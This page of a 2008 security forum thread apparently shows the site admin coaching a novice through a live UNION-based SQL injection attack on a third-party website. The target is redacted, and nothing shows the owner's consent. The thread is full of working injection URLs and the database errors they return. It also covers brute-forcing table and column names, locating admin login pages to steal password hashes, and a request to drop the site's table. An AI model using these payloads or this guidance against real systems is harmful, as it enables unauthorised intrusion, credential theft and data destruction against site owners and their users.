Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 37
Members: 0
Total: 37
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> Does this tell me anything useful Goto page Previous1, 2, 3Next
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Mon May 26, 2008 12:37 pm Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




Here is what I am getting when I run the queries:

http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+mysql.user--+

Quote:
Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM mysql.user-- . SELECT command denied to user '**REVEALS_A_USERNAME**'@'localhost' for table 'user'


http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+USER(),2,3,4,5,6,7,8--+
Quote:
**REVEALS_A_USERNAME**@localhost
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes


http://www.xxxxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+DATABASE(),2,3,4,5,6,7,8--+

Quote:
**DIFFERENT_USERNAME**
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)
Posted on 30 Nov 2007 18 total votes


The other queries all fail with output like this:
Quote:

Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM user-- . Table '**SECOND_USERNAME**.user' doesn't exist


I know one table is called 'poll'. I have a suspicion that this is part of a phpbb db, but table names like phpbb_users, phpbb_posts etc don't give me any results.

You guys are good, very good Wink Is there a way I can just drop the table 'poll' ?
View user's profile Send private message
PostPosted: Mon May 26, 2008 12:58 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




1. No, you can't drop that sql table in easy way.
2. You must analyze that website - is it running some forum, blog or CMS? Can you indentify which one? Is there anywhere user login possibilities? Try "victim.com/admin", "victim.com/admin.php" and other traditional admin interface places. You must guess sql table name before getting deeper! For example in case of phpbb and many other forums and CMS-s there is prefix which can be different from default. This can be bruteforced (if it's short) or just guessed. And one way to reveal database schema is to provoke more sql errors. So play with various URL-s and GET/POST parameters and try to get as much as possible various sql errors.
And try other "usual" table names:
news, sessions,logins,data,pages,page,people,post,posts,conf,config,pic,pictures, etc etc. This can get you better "inside look" of database internals.
One more thing: "SECOND_USERNAME" is actually database name. Does it show, what software engine is used?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon May 26, 2008 1:45 pm Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




Quote:
second_username
2 5 (27.78%)
3 6 (33.33%)
4 7 (38.89%)


Is what it shows, and I would imagine that it would be the database name.
So now I need to guess the tables to get any further?
View user's profile Send private message
PostPosted: Mon May 26, 2008 1:58 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yes. There are multiple scenarios:

1. That website does not contain web-based admin interface at all all, same with any user accounts. In means that specific sql injection is basically useless.
2. Website contains admin interface. If you can guess database table with admin password hashes, then maybe you can log in as admin. Next step depends on specific admin interface features.
3. Website contains user accounts. In this case user data theft is possible, but i'm not sure, that this will help you.
So your best shot is still possible admin interface.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon May 26, 2008 2:11 pm Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




xxx.xxx.xxx.xxx/admin redirects to phpbb 2.0.22(?) login page

It is running phpbb, but there is a chance it is a separate database.
The 'poll' table is getting info from the phpbb. These are the results of a number of polls that have been posted.

It has 'Cpanel' running on the server. xxx.xxx.xxx.xxx:443 confirms it.

Is there a tool/automation to brute force a table name in the url:

http://www.xxxxxxxx.com/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+**VARIABLE**--+
View user's profile Send private message
PostPosted: Mon May 26, 2008 2:42 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




1. Try this:

Code:

http://yourtarget.com/phpbb/memberlist.php?start=-1


If you are lucky, then nice sql error message pops up.

2. Search google:

Code:

site:yourtarget.com "SQL Error"
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon May 26, 2008 2:52 pm Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




No go on either Sad

There are some remenants of an old ikonboard forum at the site, but it redirects to phpbb 2.0.22

Other than guessing the tables, I'm stuffed!

Thank you all for your help anyway. Appreciate your time Gentlemen.
View user's profile Send private message
PostPosted: Wed May 28, 2008 7:52 pm Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




Gentlemen, I have a limited grasp of SQL. Can you break this down a little for me, so I can understand it properly?

Quote:
id=-1

Why are we saying minus 1 (-1)?

Quote:
What are the '+' signs for?

Is it to encode the URL spaces?

+UNION+ALL+SELECT+ (I'm ok with that)

Quote:
COUNT(*),2,3,4,5,6,7,8

I don't get this?

Quote:
+FROM+users--+

Why the two dashes on the end of 'users'

I know this must be tedious to answer, but it would help me no end. I've made a basic search but I can't make it out.

Thank you for your help, if you get the time.
View user's profile Send private message
PostPosted: Wed May 28, 2008 8:48 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




1. "id=-1" is id, which is probably invalid (usually id-s are >=1), so main sql query will fetch 0 results and it's easier to fetch our own data (with UNION).

2. "+UNION+SELECT+" is same as " UNION SELECT " or "%20UNION%20SELECT%20". It's just my personal habit, because "+" signs as urlencoded spaces look somehow cleaner in url Smile

3. "COUNT(*),2,3,4,5,6,7,8" - what part you don't understand? It's traditional UNION attack with 8 columns and as i am trying to guess table name and i don't know any field names either, then COUNT(*) is very useful - it will work without field name(s). Now if we have lucky and database has right table, then we can see count of rows, in case of users table it's count of user entries. And now, when we have table name, next thing is fields guessing:

"UNION+ALL+SELECT+COUNT(username),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(name),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(login),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pass),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(pwd),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(lpassword),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(hash),2,3,4,5,6,7,8+FROM+users"
"UNION+ALL+SELECT+COUNT(md5),2,3,4,5,6,7,8+FROM+users"
... etc etc etc ... till you have all wanted field names

4. "+FROM+users--+" is again my personal habit and style concerning ending comments. You know that sql injection trick from tutorials:

"UNION ALL SELECT 1,2,3,4/*"
That's commenting out using C-style comments "/*"
But mysql allows other comment types too, like two dashes and one space. And again space can be urlencoded as "+".
So it's kind of good looking commenting out: "--+" Smile
It can be "/*", "--%20" or "-- ", they all work as expected.

So as you can see i am not just copycat-ing sql injection tutorials, but instead develope new styles and tricks.
One example: collation errors. They are common problems in way of sql injection exploitation and usual counter measure is "CAST" or "CONVERT".
But in case of mysql version 5.x i suggest UNHEX(HEX(field)) construction.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu May 29, 2008 9:09 am Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




So the count(*) is a wildcard to return any field.

The 1,2,3,4,5,6,7,8 returns 8 columns ( so 1,2,3,4,5,6,7,8,9 would return 9 and 1,2,3,4 would return 4?) Why do we settle for 8? Is there a reason for this?

Understand +

Understand --+ (I was taught # in SQL but yours looks a whole lot better Smile)

Thank you again.
View user's profile Send private message
PostPosted: Thu May 29, 2008 9:15 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




1. COUNT(*) is just "count all rows":

http://dev.mysql.com/doc/refman/5.0/en/counting-rows.html

2. needed column number (in case of example it's eight) must be found previously Smile

"UNION ALL SELECT 1--+" --> error message about column count mismatch
"UNION ALL SELECT 1,2--+" --> error message
"UNION ALL SELECT 1,2,3--+" --> error message
...
"UNION ALL SELECT 1,2,3,4,5,6,7,8--+" --> no error message about column count mismatchs
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu May 29, 2008 5:05 pm Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




Ha Ha Ha!!! Fantastic!

Thank you for that! You keep knocking until you get in!

If only I could find a brute force script to keep knocking the door for this:

-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+**BRUTE FORCE**--+

Perhaps I should learn how to write shell scripts? How would I work out to keep looping on the response would be my first problem I guess.
View user's profile Send private message
PostPosted: Thu May 29, 2008 10:55 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




My personal favorite is php, so i'd use php CLI as programming platform. But anything else can be used.
One thing to mention - mysql is evolving and right there is less 5.x version and more 4.x in use. But i'm sure, that after 1-2 years most mysql servers are 5.x+. So information_schema system catalog ...

http://dev.mysql.com/doc/refman/5.0/en/information-schema.html

... will be widely available and no need for guessing or bruteforce anymore Smile
I love progress...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri May 30, 2008 7:02 am Reply with quote
tinman
Active user
Active user
Joined: May 11, 2008
Posts: 37




waraxe wrote:
I love progress...


ROFL!

Now here is a funny thing. We established that this was a Mysql 4 x server.

I execute this, just out of curiosity:
Quote:
http://www.xxxxxxxxx.xxx/archive.php?id=-1+UNION+ALL+SELECT+COUNT(*),2,3,4,5,6,7,8+FROM+information_schema.tables--+

and I get this:

Quote:
Could not execute query: SELECT question, response1, response2, response3, votes1, votes2, votes3, date from poll WHERE id = -1 UNION ALL SELECT COUNT(*),2,3,4,5,6,7,8 FROM information_schema.tables-- . SELECT command denied to user 'xxxxx_xxxxx'@'localhost' for table 'tables'

I guess this is because only the root user has access to it on 4-x?
View user's profile Send private message
PostPosted: Fri May 30, 2008 11:26 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




In 4.x there should not be "information_schema" at all.
Try this:

Code:

http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.tables--+


Code:

http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+test_schema.tables--+


Code:

http://www.x.xxx/archive.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8+FROM+information_schema.test_tables--+


And describe error messages.
View user's profile Send private message Send e-mail Visit poster's website
Does this tell me anything useful
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 2 of 3
Goto page Previous1, 2, 3Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.038 Seconds